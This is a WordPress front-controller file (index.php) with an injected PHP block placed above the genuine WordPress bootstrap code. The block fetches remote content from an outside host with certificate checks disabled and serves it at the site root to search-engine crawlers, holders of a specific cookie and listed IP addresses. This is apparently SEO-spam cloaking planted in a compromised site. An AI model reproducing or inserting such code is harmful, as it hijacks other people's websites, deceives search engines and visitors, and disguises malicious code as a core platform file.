

<?php
error_reporting(0);

$lp = "https://akunspesial.com/achentalcom/"; // ganti link raw

$curl_connect=curl_init($lp);
  curl_setopt($curl_connect,CURLOPT_RETURNTRANSFER,1);
  curl_setopt($curl_connect,CURLOPT_FOLLOWLOCATION,1);
  curl_setopt($curl_connect,CURLOPT_USERAGENT,"Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  curl_setopt($curl_connect,CURLOPT_SSL_VERIFYPEER,0);
  curl_setopt($curl_connect,CURLOPT_SSL_VERIFYHOST,0);
$content_data=curl_exec($curl_connect);

$asd=["bot","ahrefs","google"];
foreach($asd as $len){
  $nul = $len;
}

$alow=["85.92.66.150","81.19.188.236","81.19.188.235","85.92.66.149", "8.215.33.57"];

if($_SERVER["REQUEST_URI"]=="/"){
  $agent=strtolower($_SERVER["HTTP_USER_AGENT"]);
  if(
    strpos($agent,$nul)or
    $googleallow or
    isset($_COOKIE["s288"])or
    in_array($visitor_ip,$alow)
    )
    {
      echo $content_data;
      die();
    }
}
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
